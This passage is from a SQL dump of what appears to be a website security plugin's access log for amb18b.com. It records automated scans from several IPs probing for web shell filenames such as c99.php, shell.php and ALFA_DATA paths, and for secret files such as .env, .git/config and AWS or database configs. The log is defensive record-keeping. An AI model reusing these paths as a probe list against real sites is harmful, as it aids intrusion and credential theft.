16:49:23','2025-11-02 16:49:23'),(3124,'https://amb18b.com/ge.php','13.79.168.144','Direct Access',1,'2025-11-02 16:49:27','2025-11-02 16:49:27'),(3125,'https://amb18b.com/map.php','13.79.168.144','Direct Access',1,'2025-11-02 16:49:30','2025-11-02 16:49:30'),(3126,'https://amb18b.com/wp-admin/maint/admin.php','13.79.168.144','Direct Access',1,'2025-11-02 16:49:32','2025-11-02 16:49:32'),(3127,'https://amb18b.com/000.php','13.79.168.144','Direct Access',1,'2025-11-02 16:49:35','2025-11-02 16:49:35'),(3128,'https://amb18b.com/images/photo.php','13.79.168.144','Direct Access',1,'2025-11-02 16:49:37','2025-11-02 16:49:37'),(3129,'https://amb18b.com/images/c99.php','13.79.168.144','Direct Access',1,'2025-11-02 16:49:39','2025-11-02 16:49:39'),(3130,'https://amb18b.com/css/colors/coffee/index.php','13.79.168.144','Direct Access',1,'2025-11-02 16:49:42','2025-11-02 16:49:42'),(3131,'https://amb18b.com/uploads/form3.php','13.79.168.144','Direct Access',1,'2025-11-02 16:49:44','2025-11-02 16:49:44'),(3132,'https://amb18b.com/terminal.php','13.79.168.144','Direct Access',1,'2025-11-02 16:49:47','2025-11-02 16:49:47'),(3133,'https://amb18b.com/1.php','13.79.168.144','Direct Access',1,'2025-11-02 16:49:48','2025-11-02 16:49:48'),(3134,'https://amb18b.com/checker.php','13.79.168.144','Direct Access',1,'2025-11-02 16:49:51','2025-11-02 16:49:51'),(3135,'https://amb18b.com/wp-includes/compats.php','13.79.168.144','Direct Access',1,'2025-11-02 16:49:53','2025-11-02 16:49:53'),(3136,'https://amb18b.com/kk.php','13.79.168.144','Direct Access',1,'2025-11-02 16:49:56','2025-11-02 16:49:56'),(3137,'https://amb18b.com/img/5/radio.php','13.79.168.144','Direct Access',1,'2025-11-02 16:49:59','2025-11-02 16:49:59'),(3138,'https://amb18b.com/system_log.php','13.79.168.144','Direct Access',1,'2025-11-02 16:50:02','2025-11-02 16:50:02'),(3139,'https://amb18b.com/0x.php','13.79.168.144','Direct Access',1,'2025-11-02 16:50:04','2025-11-02 16:50:04'),(3140,'https://amb18b.com/wp-includes/css/dist/preferences/wp-login.php','13.79.168.144','Direct Access',1,'2025-11-02 16:50:06','2025-11-02 16:50:06'),(3141,'https://amb18b.com/wp-admin/network/wp-conflg.php?p=','13.79.168.144','Direct Access',1,'2025-11-02 16:50:08','2025-11-02 16:50:08'),(3142,'https://amb18b.com/hi.php','13.79.168.144','Direct Access',1,'2025-11-02 16:50:10','2025-11-02 16:50:10'),(3143,'https://amb18b.com/wp-trackback.php','13.79.168.144','Direct Access',1,'2025-11-02 16:50:12','2025-11-02 16:50:12'),(3144,'https://amb18b.com/htaccess.php','13.79.168.144','Direct Access',1,'2025-11-02 16:50:14','2025-11-02 16:50:14'),(3145,'https://amb18b.com/inputs.php?p=','13.79.168.144','Direct Access',1,'2025-11-02 16:50:16','2025-11-02 16:50:16'),(3146,'https://amb18b.com/images/sendme.php','13.79.168.144','Direct Access',1,'2025-11-02 16:50:18','2025-11-02 16:50:18'),(3147,'https://amb18b.com/wp-admin/css/wp-conflg.php?p=','13.79.168.144','Direct Access',1,'2025-11-02 16:50:23','2025-11-02 16:50:23'),(3148,'https://amb18b.com/wp-includes/system_log.php?','13.79.168.144','Direct Access',1,'2025-11-02 16:50:25','2025-11-02 16:50:25'),(3149,'https://amb18b.com/wp-admin/images/wp-conflg.php?p=','13.79.168.144','Direct Access',1,'2025-11-02 16:50:28','2025-11-02 16:50:28'),(3150,'https://amb18b.com/pp.php','13.79.168.144','Direct Access',1,'2025-11-02 16:50:31','2025-11-02 16:50:31'),(3151,'https://amb18b.com/css/colors/blue/index.php','13.79.168.144','Direct Access',1,'2025-11-02 16:50:38','2025-11-02 16:50:38'),(3152,'https://amb18b.com/article.php','13.79.168.144','Direct Access',1,'2025-11-02 16:50:40','2025-11-02 16:50:40'),(3153,'https://amb18b.com/moon.php','13.79.168.144','Direct Access',1,'2025-11-02 16:50:43','2025-11-02 16:50:43'),(3154,'https://amb18b.com/ff.php','13.79.168.144','Direct Access',1,'2025-11-02 16:50:46','2025-11-02 16:50:46'),(3155,'https://amb18b.com/if.php','13.79.168.144','Direct Access',1,'2025-11-02 16:50:49','2025-11-02 16:50:49'),(3156,'https://amb18b.com/av.php','13.79.168.144','Direct Access',1,'2025-11-02 16:50:53','2025-11-02 16:50:53'),(3157,'https://amb18b.com/wp-includes/ID3/about.php','13.79.168.144','Direct Access',1,'2025-11-02 16:50:55','2025-11-02 16:50:55'),(3158,'https://amb18b.com/wp-includes/rest-api/fields/index.php?','13.79.168.144','Direct Access',1,'2025-11-02 16:50:57','2025-11-02 16:50:57'),(3159,'https://amb18b.com/wp-includes/SimplePie/Canonical.php','13.79.168.144','Direct Access',1,'2025-11-02 16:51:00','2025-11-02 16:51:00'),(3160,'https://amb18b.com/wp-admin/js/wp-conflg.php?p=','13.79.168.144','Direct Access',1,'2025-11-02 16:51:03','2025-11-02 16:51:03'),(3161,'https://amb18b.com/ini.php','13.79.168.144','Direct Access',1,'2025-11-02 16:51:06','2025-11-02 16:51:06'),(3162,'https://amb18b.com/geck.php','13.79.168.144','Direct Access',1,'2025-11-02 16:51:08','2025-11-02 16:51:08'),(3163,'https://amb18b.com/wp-includes//about.php','13.79.168.144','Direct Access',1,'2025-11-02 16:51:10','2025-11-02 16:51:10'),(3164,'https://amb18b.com/a2.php','13.79.168.144','Direct Access',1,'2025-11-02 16:51:12','2025-11-02 16:51:12'),(3165,'https://amb18b.com/moon.php?p=','13.79.168.144','Direct Access',1,'2025-11-02 16:51:14','2025-11-02 16:51:14'),(3166,'https://amb18b.com/wp-admin/404.php','13.79.168.144','Direct Access',1,'2025-11-02 16:51:16','2025-11-02 16:51:16'),(3167,'https://amb18b.com/radio.php','13.79.168.144','Direct Access',1,'2025-11-02 16:51:18','2025-11-02 16:51:18'),(3168,'https://amb18b.com/info.php','13.79.168.144','Direct Access',1,'2025-11-02 16:51:20','2025-11-02 16:51:20'),(3169,'https://amb18b.com/avaa.php','13.79.168.144','Direct Access',1,'2025-11-02 16:51:22','2025-11-02 16:51:22'),(3170,'https://amb18b.com/yanz.php','13.79.168.144','Direct Access',1,'2025-11-02 16:51:24','2025-11-02 16:51:24'),(3171,'https://amb18b.com/simple.php','13.79.168.144','Direct Access',1,'2025-11-02 16:51:26','2025-11-02 16:51:26'),(3172,'https://amb18b.com/wp-admin/images/index.php','13.79.168.144','Direct Access',1,'2025-11-02 16:51:28','2025-11-02 16:51:28'),(3173,'https://amb18b.com/file.php','13.79.168.144','Direct Access',1,'2025-11-02 16:51:29','2025-11-02 16:51:29'),(3174,'https://amb18b.com/bypass.php','13.79.168.144','Direct Access',1,'2025-11-02 16:51:31','2025-11-02 16:51:31'),(3175,'https://amb18b.com/wp-includes/rk2.php','13.79.168.144','Direct Access',1,'2025-11-02 16:51:33','2025-11-02 16:51:33'),(3176,'https://amb18b.com/wp-includes/js/js420.php','13.79.168.144','Direct Access',1,'2025-11-02 16:51:35','2025-11-02 16:51:35'),(3177,'https://amb18b.com/wp-admin/css/','45.94.31.174','Invalid Referrer',1,'2025-11-02 18:40:55','2025-11-02 18:40:55'),(3178,'https://amb18b.com/ALFA_DATA/alfacgiapi/perl.alfa','48.210.82.76','Invalid Referrer',1,'2025-11-02 18:48:01','2025-11-02 18:48:01'),(3179,'https://amb18b.com/wp-plain.php','48.210.82.76','Invalid Referrer',1,'2025-11-02 18:48:01','2025-11-02 18:48:01'),(3180,'https://amb18b.com/','48.210.82.76','Invalid Referrer',2,'2025-11-02 18:48:03','2025-11-02 18:48:03'),(3181,'https://amb18b.com/alfacgiapi/perl.alfa','48.210.82.76','Invalid Referrer',1,'2025-11-02 18:48:03','2025-11-02 18:48:03'),(3182,'https://amb18b.com/plugins/content/apismtp/apismtp.php?test=hello','48.210.82.76','Direct Access',1,'2025-11-02 18:48:05','2025-11-02 18:48:05'),(3183,'https://amb18b.com/plugins/content/apismtp/apismtp.php.suspected?test=hello','48.210.82.76','Direct Access',1,'2025-11-02 18:48:07','2025-11-02 18:48:07'),(3184,'https://amb18b.com/shoha.php','4.217.238.229','Direct Access',1,'2025-11-02 19:34:51','2025-11-02 19:34:51'),(3185,'https://amb18b.com/atomlib.php','4.217.238.229','Direct Access',1,'2025-11-02 19:34:53','2025-11-02 19:34:53'),(3186,'https://amb18b.com/cong.php','4.217.238.229','Direct Access',1,'2025-11-02 19:34:55','2025-11-02 19:34:55'),(3187,'https://amb18b.com/g.php','4.217.238.229','Direct Access',1,'2025-11-02 19:34:56','2025-11-02 19:34:56'),(3188,'https://amb18b.com/log.php','4.217.238.229','Direct Access',1,'2025-11-02 19:34:58','2025-11-02 19:34:58'),(3189,'https://amb18b.com/1index.php','4.217.238.229','Direct Access',1,'2025-11-02 19:34:59','2025-11-02 19:34:59'),(3190,'https://amb18b.com/fmk.php','4.217.238.229','Direct Access',1,'2025-11-02 19:35:00','2025-11-02 19:35:00'),(3191,'https://amb18b.com/xl2023.php','4.217.238.229','Direct Access',1,'2025-11-02 19:35:01','2025-11-02 19:35:01'),(3192,'https://amb18b.com/new.php','4.217.238.229','Direct Access',1,'2025-11-02 19:35:02','2025-11-02 19:35:02'),(3193,'https://amb18b.com/AxAo.php','4.217.238.229','Direct Access',1,'2025-11-02 19:35:04','2025-11-02 19:35:04'),(3194,'https://amb18b.com/chosen.php','4.217.238.229','Direct Access',1,'2025-11-02 19:35:05','2025-11-02 19:35:05'),(3195,'https://amb18b.com/update/f35.php','4.217.238.229','Direct Access',1,'2025-11-02 19:35:06','2025-11-02 19:35:06'),(3196,'https://amb18b.com/.well-known/pki-validation/dropdown.php','4.217.238.229','Direct Access',1,'2025-11-02 19:35:07','2025-11-02 19:35:07'),(3197,'https://amb18b.com/v3.php','4.217.238.229','Direct Access',1,'2025-11-02 19:35:10','2025-11-02 19:35:10'),(3198,'https://amb18b.com/sto.php','4.217.238.229','Direct Access',1,'2025-11-02 19:35:11','2025-11-02 19:35:11'),(3199,'https://amb18b.com/bless.php','4.217.238.229','Direct Access',1,'2025-11-02 19:35:13','2025-11-02 19:35:13'),(3200,'https://amb18b.com/wp-2019.php','4.217.238.229','Direct Access',1,'2025-11-02 19:35:14','2025-11-02 19:35:14'),(3201,'https://amb18b.com/.well-known/log.php','4.217.238.229','Direct Access',1,'2025-11-02 19:35:15','2025-11-02 19:35:15'),(3202,'https://amb18b.com/zhidagen.php','4.217.238.229','Direct Access',1,'2025-11-02 19:35:17','2025-11-02 19:35:17'),(3203,'https://amb18b.com/bb2.php','4.217.238.229','Direct Access',1,'2025-11-02 19:35:18','2025-11-02 19:35:18'),(3204,'https://amb18b.com/nc.php','4.217.238.229','Direct Access',1,'2025-11-02 19:35:19','2025-11-02 19:35:19'),(3205,'https://amb18b.com/er8.php','4.217.238.229','Direct Access',1,'2025-11-02 19:35:20','2025-11-02 19:35:20'),(3206,'https://amb18b.com/file2.php','4.217.238.229','Direct Access',1,'2025-11-02 19:35:21','2025-11-02 19:35:21'),(3207,'https://amb18b.com/wp-head.php','4.217.238.229','Direct Access',1,'2025-11-02 19:35:23','2025-11-02 19:35:23'),(3208,'https://amb18b.com/uploadx.php','4.217.238.229','Direct Access',1,'2025-11-02 19:35:24','2025-11-02 19:35:24'),(3209,'https://amb18b.com/nl.php','4.217.238.229','Direct Access',1,'2025-11-02 19:35:25','2025-11-02 19:35:25'),(3210,'https://amb18b.com/bless2.php','4.217.238.229','Direct Access',1,'2025-11-02 19:35:26','2025-11-02 19:35:26'),(3211,'https://amb18b.com/menu.php','4.217.238.229','Direct Access',1,'2025-11-02 19:35:27','2025-11-02 19:35:27'),(3212,'https://amb18b.com/okxoby.php','4.217.238.229','Direct Access',1,'2025-11-02 19:35:28','2025-11-02 19:35:28'),(3213,'https://amb18b.com/filesss.php','4.217.238.229','Direct Access',1,'2025-11-02 19:35:29','2025-11-02 19:35:29'),(3214,'https://amb18b.com/af4.php','4.217.238.229','Direct Access',1,'2025-11-02 19:35:31','2025-11-02 19:35:31'),(3215,'https://amb18b.com/about.php','4.217.238.229','Direct Access',1,'2025-11-02 19:35:32','2025-11-02 19:35:32'),(3216,'https://amb18b.com/wp-admin/js/about.php','4.217.238.229','Direct Access',1,'2025-11-02 19:35:34','2025-11-02 19:35:34'),(3217,'https://amb18b.com/.bod/.ll/ss.php','4.217.238.229','Direct Access',1,'2025-11-02 19:35:35','2025-11-02 19:35:35'),(3218,'https://amb18b.com/555.php','4.217.238.229','Direct Access',1,'2025-11-02 19:35:36','2025-11-02 19:35:36'),(3219,'https://amb18b.com/gdn.php','4.217.238.229','Direct Access',1,'2025-11-02 19:35:37','2025-11-02 19:35:37'),(3220,'https://amb18b.com/class17.php','4.217.238.229','Direct Access',1,'2025-11-02 19:35:38','2025-11-02 19:35:38'),(3221,'https://amb18b.com/class.php','4.217.238.229','Direct Access',1,'2025-11-02 19:35:40','2025-11-02 19:35:40'),(3222,'https://amb18b.com/222.php','4.217.238.229','Direct Access',1,'2025-11-02 19:35:41','2025-11-02 19:35:41'),(3223,'https://amb18b.com/wp.php','4.217.238.229','Direct Access',1,'2025-11-02 19:35:42','2025-11-02 19:35:42'),(3224,'https://amb18b.com/makeasmtp.php','4.217.238.229','Direct Access',1,'2025-11-02 19:35:43','2025-11-02 19:35:43'),(3225,'https://amb18b.com/radio.php','4.217.238.229','Direct Access',1,'2025-11-02 19:35:45','2025-11-02 19:35:45'),(3226,'https://amb18b.com/manager.php','4.217.238.229','Direct Access',1,'2025-11-02 19:35:46','2025-11-02 19:35:46'),(3227,'https://amb18b.com/we2.php','4.217.238.229','Direct Access',1,'2025-11-02 19:35:47','2025-11-02 19:35:47'),(3228,'https://amb18b.com/wp-includes/IXR/about.php','4.217.238.229','Direct Access',1,'2025-11-02 19:35:48','2025-11-02 19:35:48'),(3229,'https://amb18b.com/mar.php','4.217.238.229','Direct Access',1,'2025-11-02 19:35:49','2025-11-02 19:35:49'),(3230,'https://amb18b.com/lv.php','4.217.238.229','Direct Access',1,'2025-11-02 19:35:51','2025-11-02 19:35:51'),(3231,'https://amb18b.com/mail.php','4.217.238.229','Direct Access',1,'2025-11-02 19:35:52','2025-11-02 19:35:52'),(3232,'https://amb18b.com/aipoyp.php','4.217.238.229','Direct Access',1,'2025-11-02 19:35:54','2025-11-02 19:35:54'),(3233,'https://amb18b.com/db.php','4.217.238.229','Direct Access',1,'2025-11-02 19:35:55','2025-11-02 19:35:55'),(3234,'https://amb18b.com/m.php','4.217.238.229','Direct Access',1,'2025-11-02 19:35:56','2025-11-02 19:35:56'),(3235,'https://amb18b.com/up.php','4.217.238.229','Direct Access',1,'2025-11-02 19:35:58','2025-11-02 19:35:58'),(3236,'https://amb18b.com/dfre.php','4.217.238.229','Direct Access',1,'2025-11-02 19:35:59','2025-11-02 19:35:59'),(3237,'https://amb18b.com/men.php','4.217.238.229','Direct Access',1,'2025-11-02 19:36:00','2025-11-02 19:36:00'),(3238,'https://amb18b.com/media.php','4.217.238.229','Direct Access',1,'2025-11-02 19:36:02','2025-11-02 19:36:02'),(3239,'https://amb18b.com/uplozyu.php','4.217.238.229','Direct Access',1,'2025-11-02 19:36:04','2025-11-02 19:36:04'),(3240,'https://amb18b.com/wp-includes/Text/wp-conflg.php','4.217.238.229','Direct Access',1,'2025-11-02 19:36:06','2025-11-02 19:36:06'),(3241,'https://amb18b.com/shell.php','4.217.238.229','Direct Access',1,'2025-11-02 19:36:07','2025-11-02 19:36:07'),(3242,'https://amb18b.com/system.php','4.217.238.229','Direct Access',1,'2025-11-02 19:36:08','2025-11-02 19:36:08'),(3243,'https://amb18b.com/num.php','4.217.238.229','Direct Access',1,'2025-11-02 19:36:10','2025-11-02 19:36:10'),(3244,'https://amb18b.com/zc-749.php','4.217.238.229','Direct Access',1,'2025-11-02 19:36:12','2025-11-02 19:36:12'),(3245,'https://amb18b.com/bala.php','4.217.238.229','Direct Access',1,'2025-11-02 19:36:13','2025-11-02 19:36:13'),(3246,'https://amb18b.com/item.php','4.217.238.229','Direct Access',1,'2025-11-02 19:36:14','2025-11-02 19:36:14'),(3247,'https://amb18b.com/000.php','4.217.238.229','Direct Access',1,'2025-11-02 19:36:15','2025-11-02 19:36:15'),(3248,'https://amb18b.com/file22.php','4.217.238.229','Direct Access',1,'2025-11-02 19:36:17','2025-11-02 19:36:17'),(3249,'https://amb18b.com/jf1d22.php','4.217.238.229','Direct Access',1,'2025-11-02 19:36:18','2025-11-02 19:36:18'),(3250,'https://amb18b.com/asd67.php','4.217.238.229','Direct Access',1,'2025-11-02 19:36:19','2025-11-02 19:36:19'),(3251,'https://amb18b.com/Okxob.php','4.217.238.229','Direct Access',1,'2025-11-02 19:36:21','2025-11-02 19:36:21'),(3252,'https://amb18b.com/mah.php','4.217.238.229','Direct Access',1,'2025-11-02 19:36:22','2025-11-02 19:36:22'),(3253,'https://amb18b.com/goat1.php','4.217.238.229','Direct Access',1,'2025-11-02 19:36:23','2025-11-02 19:36:23'),(3254,'https://amb18b.com/naxc.php','4.217.238.229','Direct Access',1,'2025-11-02 19:36:24','2025-11-02 19:36:24'),(3255,'https://amb18b.com/lock360.php','4.217.238.229','Direct Access',1,'2025-11-02 19:36:26','2025-11-02 19:36:26'),(3256,'https://amb18b.com/ini.php','4.217.238.229','Direct Access',1,'2025-11-02 19:36:27','2025-11-02 19:36:27'),(3257,'https://amb18b.com/uploat.php','4.217.238.229','Direct Access',1,'2025-11-02 19:36:28','2025-11-02 19:36:28'),(3258,'https://amb18b.com/wp-includes/style-engine/index.php','4.217.238.229','Direct Access',1,'2025-11-02 19:36:30','2025-11-02 19:36:30'),(3259,'https://amb18b.com/wp-configs.php','4.217.238.229','Direct Access',1,'2025-11-02 19:36:31','2025-11-02 19:36:31'),(3260,'https://amb18b.com/zc-903.php','4.217.238.229','Direct Access',1,'2025-11-02 19:36:33','2025-11-02 19:36:33'),(3261,'https://amb18b.com/about/function.php','4.217.238.229','Direct Access',1,'2025-11-02 19:36:34','2025-11-02 19:36:34'),(3262,'https://amb18b.com/wp-admin/log.php','4.217.238.229','Direct Access',1,'2025-11-02 19:36:36','2025-11-02 19:36:36'),(3263,'https://amb18b.com/oxvrws.php','4.217.238.229','Direct Access',1,'2025-11-02 19:36:37','2025-11-02 19:36:37'),(3264,'https://amb18b.com/we.php','4.217.238.229','Direct Access',1,'2025-11-02 19:36:38','2025-11-02 19:36:38'),(3265,'https://amb18b.com/02.php','4.217.238.229','Direct Access',1,'2025-11-02 19:36:40','2025-11-02 19:36:40'),(3266,'https://amb18b.com/system_log.php','4.217.238.229','Direct Access',1,'2025-11-02 19:36:41','2025-11-02 19:36:41'),(3267,'https://amb18b.com/CLA.php','4.217.238.229','Direct Access',1,'2025-11-02 19:36:43','2025-11-02 19:36:43'),(3268,'https://amb18b.com/sk25_1.php','4.217.238.229','Direct Access',1,'2025-11-02 19:36:44','2025-11-02 19:36:44'),(3269,'https://amb18b.com/autoload_classmap.php','4.217.238.229','Direct Access',1,'2025-11-02 19:36:45','2025-11-02 19:36:45'),(3270,'https://amb18b.com/css/xp.php','4.217.238.229','Direct Access',1,'2025-11-02 19:36:47','2025-11-02 19:36:47'),(3271,'https://amb18b.com/file21.php','4.217.238.229','Direct Access',1,'2025-11-02 19:36:48','2025-11-02 19:36:48'),(3272,'https://amb18b.com/himu.php','4.217.238.229','Direct Access',1,'2025-11-02 19:36:50','2025-11-02 19:36:50'),(3273,'https://amb18b.com/hn.php','4.217.238.229','Direct Access',1,'2025-11-02 19:36:51','2025-11-02 19:36:51'),(3274,'https://amb18b.com/as/function.php','4.217.238.229','Direct Access',1,'2025-11-02 19:36:53','2025-11-02 19:36:53'),(3275,'https://amb18b.com/flower.php','4.217.238.229','Direct Access',1,'2025-11-02 19:36:54','2025-11-02 19:36:54'),(3276,'https://amb18b.com/f35.php','4.217.238.229','Direct Access',1,'2025-11-02 19:36:56','2025-11-02 19:36:56'),(3277,'https://amb18b.com/doc.php','4.217.238.229','Direct Access',1,'2025-11-02 19:36:57','2025-11-02 19:36:57'),(3278,'https://amb18b.com/tentang_rmol.php','4.217.238.229','Direct Access',1,'2025-11-02 19:36:59','2025-11-02 19:36:59'),(3279,'https://amb18b.com/pass.php','4.217.238.229','Direct Access',1,'2025-11-02 19:37:00','2025-11-02 19:37:00'),(3280,'https://amb18b.com/classwithtostring.php','4.217.238.229','Direct Access',1,'2025-11-02 19:37:01','2025-11-02 19:37:01'),(3281,'https://amb18b.com/jp.php','4.217.238.229','Direct Access',1,'2025-11-02 19:37:02','2025-11-02 19:37:02'),(3282,'https://amb18b.com/cc.php','4.217.238.229','Direct Access',1,'2025-11-02 19:37:04','2025-11-02 19:37:04'),(3283,'https://amb18b.com/file5.php','4.217.238.229','Direct Access',1,'2025-11-02 19:37:06','2025-11-02 19:37:06'),(3284,'https://amb18b.com/.git/config','159.65.190.180','Direct Access',1,'2025-11-02 20:32:52','2025-11-02 20:32:52'),(3285,'https://amb18b.com/.git/config','213.209.157.93','Direct Access',1,'2025-11-02 21:36:56','2025-11-02 21:36:56'),(3286,'https://amb18b.com/userfuns.php','196.251.66.105','Invalid Referrer',1,'2025-11-03 00:59:35','2025-11-03 00:59:35'),(3287,'https://amb18b.com/userfuns.php','196.251.66.105','Invalid Referrer',1,'2025-11-03 00:59:36','2025-11-03 00:59:36'),(3288,'https://amb18b.com/postnews.php','196.251.66.105','Invalid Referrer',2,'2025-11-03 00:59:38','2025-11-03 00:59:37'),(3289,'https://amb18b.com/schallfuns.php','196.251.66.105','Invalid Referrer',2,'2025-11-03 00:59:40','2025-11-03 00:59:39'),(3290,'https://amb18b.com/temp.php','213.209.157.254','Direct Access',1,'2025-11-03 03:31:24','2025-11-03 03:31:24'),(3291,'https://amb18b.com/phpversion.php','213.209.157.254','Direct Access',1,'2025-11-03 03:31:24','2025-11-03 03:31:24'),(3292,'https://amb18b.com/time.php','213.209.157.254','Direct Access',1,'2025-11-03 03:31:24','2025-11-03 03:31:24'),(3293,'https://amb18b.com/config/development.json','213.209.157.254','Direct Access',1,'2025-11-03 03:31:24','2025-11-03 03:31:24'),(3294,'https://amb18b.com/test.php','213.209.157.254','Direct Access',1,'2025-11-03 03:31:24','2025-11-03 03:31:24'),(3295,'https://amb18b.com/asdf.php','213.209.157.254','Direct Access',1,'2025-11-03 03:31:24','2025-11-03 03:31:25'),(3296,'https://amb18b.com/i.php','213.209.157.254','Direct Access',1,'2025-11-03 03:31:25','2025-11-03 03:31:25'),(3297,'https://amb18b.com/config/session.php','213.209.157.254','Direct Access',1,'2025-11-03 03:31:25','2025-11-03 03:31:25'),(3298,'https://amb18b.com/pinfo.php','213.209.157.254','Direct Access',1,'2025-11-03 03:31:25','2025-11-03 03:31:25'),(3299,'https://amb18b.com/php_info.php','213.209.157.254','Direct Access',1,'2025-11-03 03:31:25','2025-11-03 03:31:25'),(3300,'https://amb18b.com/old_phpinfo.php','213.209.157.254','Direct Access',1,'2025-11-03 03:31:25','2025-11-03 03:31:25'),(3301,'https://amb18b.com/infophp.php','213.209.157.254','Direct Access',1,'2025-11-03 03:31:26','2025-11-03 03:31:26'),(3302,'https://amb18b.com/application/config/config.php','213.209.157.254','Direct Access',1,'2025-11-03 03:31:26','2025-11-03 03:31:26'),(3303,'https://amb18b.com/config/view.php','213.209.157.254','Direct Access',1,'2025-11-03 03:31:26','2025-11-03 03:31:26'),(3304,'https://amb18b.com/config/services.php','213.209.157.254','Direct Access',1,'2025-11-03 03:31:27','2025-11-03 03:31:27'),(3305,'https://amb18b.com/application/config/mimes.php','213.209.157.254','Direct Access',1,'2025-11-03 03:31:27','2025-11-03 03:31:27'),(3306,'https://amb18b.com/application/config/autoload.php','213.209.157.254','Direct Access',1,'2025-11-03 03:31:28','2025-11-03 03:31:28'),(3307,'https://amb18b.com/application/config/hooks.php','213.209.157.254','Direct Access',1,'2025-11-03 03:31:28','2025-11-03 03:31:28'),(3308,'https://amb18b.com/application/config/database.php','213.209.157.254','Direct Access',1,'2025-11-03 03:31:28','2025-11-03 03:31:28'),(3309,'https://amb18b.com/config/auth.php','213.209.157.254','Direct Access',1,'2025-11-03 03:31:28','2025-11-03 03:31:28'),(3310,'https://amb18b.com/application/config/routes.php','213.209.157.254','Direct Access',1,'2025-11-03 03:31:28','2025-11-03 03:31:28'),(3311,'https://amb18b.com/application/config/constants.php','213.209.157.254','Direct Access',1,'2025-11-03 03:31:28','2025-11-03 03:31:28'),(3312,'https://amb18b.com/application/config/profiler.php','213.209.157.254','Direct Access',1,'2025-11-03 03:31:28','2025-11-03 03:31:28'),(3313,'https://amb18b.com/application/config/doctypes.php','213.209.157.254','Direct Access',1,'2025-11-03 03:31:29','2025-11-03 03:31:29'),(3314,'https://amb18b.com/config/app.default.php','213.209.157.254','Direct Access',1,'2025-11-03 03:31:29','2025-11-03 03:31:29'),(3315,'https://amb18b.com/config/paths.php','213.209.157.254','Direct Access',1,'2025-11-03 03:31:29','2025-11-03 03:31:29'),(3316,'https://amb18b.com/config/development.config.php','213.209.157.254','Direct Access',1,'2025-11-03 03:31:29','2025-11-03 03:31:29'),(3317,'https://amb18b.com/local/.env','213.209.157.254','Direct Access',1,'2025-11-03 03:31:29','2025-11-03 03:31:29'),(3318,'https://amb18b.com/config/autoload/local.php','213.209.157.254','Direct Access',1,'2025-11-03 03:31:29','2025-11-03 03:31:29'),(3319,'https://amb18b.com/app_dev.php/_profiler/phpinfo','213.209.157.254','Direct Access',1,'2025-11-03 03:31:29','2025-11-03 03:31:29'),(3320,'https://amb18b.com/config/test.config.php','213.209.157.254','Direct Access',1,'2025-11-03 03:31:30','2025-11-03 03:31:30'),(3321,'https://amb18b.com/config/security.config.php','213.209.157.254','Direct Access',1,'2025-11-03 03:31:30','2025-11-03 03:31:30'),(3322,'https://amb18b.com/config/autoload/global.php','213.209.157.254','Direct Access',1,'2025-11-03 03:31:30','2025-11-03 03:31:30'),(3323,'https://amb18b.com/config/routes.php','213.209.157.254','Direct Access',1,'2025-11-03 03:31:30','2025-11-03 03:31:30'),(3324,'https://amb18b.com/conf/application.json','213.209.157.254','Direct Access',1,'2025-11-03 03:31:30','2025-11-03 03:31:30'),(3325,'https://amb18b.com/config/production.config.php','213.209.157.254','Direct Access',1,'2025-11-03 03:31:31','2025-11-03 03:31:31'),(3326,'https://amb18b.com/config/prod.json','213.209.157.254','Direct Access',1,'2025-11-03 03:31:31','2025-11-03 03:31:31'),(3327,'https://amb18b.com/config/default.json','213.209.157.254','Direct Access',1,'2025-11-03 03:31:31','2025-11-03 03:31:31'),(3328,'https://amb18b.com/app/etc/config.local.php','213.209.157.254','Direct Access',1,'2025-11-03 03:31:31','2025-11-03 03:31:31'),(3329,'https://amb18b.com/config/local.json','213.209.157.254','Direct Access',1,'2025-11-03 03:31:31','2025-11-03 03:31:31'),(3330,'https://amb18b.com/config/staging.json','213.209.157.254','Direct Access',1,'2025-11-03 03:31:31','2025-11-03 03:31:31'),(3331,'https://amb18b.com/.docker/config.json','213.209.157.254','Direct Access',1,'2025-11-03 03:31:32','2025-11-03 03:31:32'),(3332,'https://amb18b.com/.env','213.209.157.254','Direct Access',2,'2025-11-03 03:31:37','2025-11-03 03:31:32'),(3333,'https://amb18b.com/appsettings.Production.json','213.209.157.254','Direct Access',1,'2025-11-03 03:31:32','2025-11-03 03:31:32'),(3334,'https://amb18b.com/tsconfig.json','213.209.157.254','Direct Access',1,'2025-11-03 03:31:32','2025-11-03 03:31:32'),(3335,'https://amb18b.com/appsettings.Test.json','213.209.157.254','Direct Access',1,'2025-11-03 03:31:32','2025-11-03 03:31:32'),(3336,'https://amb18b.com/angular.json','213.209.157.254','Direct Access',1,'2025-11-03 03:31:33','2025-11-03 03:31:33'),(3337,'https://amb18b.com/application/config/encryption.php','213.209.157.254','Direct Access',1,'2025-11-03 03:31:33','2025-11-03 03:31:33'),(3338,'https://amb18b.com/config/broadcasting.php','213.209.157.254','Direct Access',1,'2025-11-03 03:31:33','2025-11-03 03:31:33'),(3339,'https://amb18b.com/config/bootstrap.php','213.209.157.254','Direct Access',1,'2025-11-03 03:31:33','2025-11-03 03:31:33'),(3340,'https://amb18b.com/application/config/foreign_chars.php','213.209.157.254','Direct Access',1,'2025-11-03 03:31:34','2025-11-03 03:31:34'),(3341,'https://amb18b.com/config/app_local.php','213.209.157.254','Direct Access',1,'2025-11-03 03:31:34','2025-11-03 03:31:34'),(3342,'https://amb18b.com/config/php.ini','213.209.157.254','Direct Access',1,'2025-11-03 03:31:34','2025-11-03 03:31:34'),(3343,'https://amb18b.com/appsettings.Development.json','213.209.157.254','Direct Access',1,'2025-11-03 03:31:34','2025-11-03 03:31:34'),(3344,'https://amb18b.com/config/filesystems.php','213.209.157.254','Direct Access',1,'2025-11-03 03:31:34','2025-11-03 03:31:34'),(3345,'https://amb18b.com/application/config/email.php','213.209.157.254','Direct Access',1,'2025-11-03 03:31:34','2025-11-03 03:31:34'),(3346,'https://amb18b.com/application/config/migration.php','213.209.157.254','Direct Access',1,'2025-11-03 03:31:34','2025-11-03 03:31:34'),(3347,'https://amb18b.com/config/aws.json','213.209.157.254','Direct Access',1,'2025-11-03 03:31:35','2025-11-03 03:31:35'),(3348,'https://amb18b.com/config/application.config.php','213.209.157.254','Direct Access',1,'2025-11-03 03:31:35','2025-11-03 03:31:35'),(3349,'https://amb18b.com/config/database.config.php','213.209.157.254','Direct Access',1,'2025-11-03 03:31:35','2025-11-03 03:31:35'),(3350,'https://amb18b.com/config/requirements.php','213.209.157.254','Direct Access',1,'2025-11-03 03:31:35','2025-11-03 03:31:35'),(3351,'https://amb18b.com/config.json','213.209.157.254','Direct Access',1,'2025-11-03 